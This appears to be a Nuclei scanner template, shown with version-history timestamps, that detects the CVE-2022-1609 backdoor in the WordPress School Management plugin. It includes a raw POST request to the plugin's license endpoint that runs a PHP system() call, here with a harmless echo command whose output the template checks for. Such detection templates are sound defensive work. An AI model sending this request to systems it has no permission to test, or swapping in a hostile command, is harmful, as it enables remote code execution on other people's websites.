2022-05-26 06:25:43 +00:00
id : CVE-2022-1609
info :
2022-05-27 15:14:09 +00:00
name : The School Management < 9.9.7 - Remote Code Execution
2022-05-26 06:25:43 +00:00
author : For3stCo1d
severity : critical
2022-05-27 15:14:09 +00:00
description : The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
2022-05-26 06:25:43 +00:00
reference :
2022-05-27 07:14:13 +00:00
- https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
2022-05-26 06:25:43 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
2024-03-23 09:28:19 +00:00
- https://github.com/nastar-id/WP-school-management-RCE
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/0x007f/cve-2022-1609-exploit
2022-05-27 15:14:09 +00:00
classification :
2024-03-23 09:28:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-05-27 15:14:09 +00:00
cve-id : CVE-2022-1609
2024-03-23 09:28:19 +00:00
cwe-id : CWE-94
epss-score : 0.11941
epss-percentile : 0.95204
cpe : cpe:2.3:a:weblizar:school_management:*:*:*:*:pro:wordpress:*:*
2023-08-31 11:46:18 +00:00
metadata :
verified : false
2023-09-06 11:59:08 +00:00
max-request : 1
2024-03-23 09:28:19 +00:00
vendor : weblizar
product : school_management
framework : wordpress
2024-06-07 10:04:29 +00:00
tags : cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar
2022-05-26 06:25:43 +00:00
variables :
2022-05-27 07:14:13 +00:00
cmd : "echo CVE-2022-1609 | rev"
2022-05-26 06:25:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-26 06:25:43 +00:00
- raw :
- |
POST /wp-json/am-member/license HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-05-27 07:14:13 +00:00
blowfish=1&blowf=system('{{cmd}}');
2022-05-26 06:25:43 +00:00
matchers-condition : and
matchers :
- type : word
2022-05-31 08:44:45 +00:00
part : body
2022-05-26 06:25:43 +00:00
words :
2022-05-27 07:14:13 +00:00
- '9061-2202-EVC'
2024-06-08 16:02:17 +00:00
# digest: 490a00463044022006ac36ef4fb14e287e48e1479ad2fb77dc49199635a40a456cb0bf43a65436b002203dacc45bd8460cd438412e3c7c3e8568758fb7a8d18b6f4aa44023bed3192f89:922c64590222798bb761d5b6d8e72950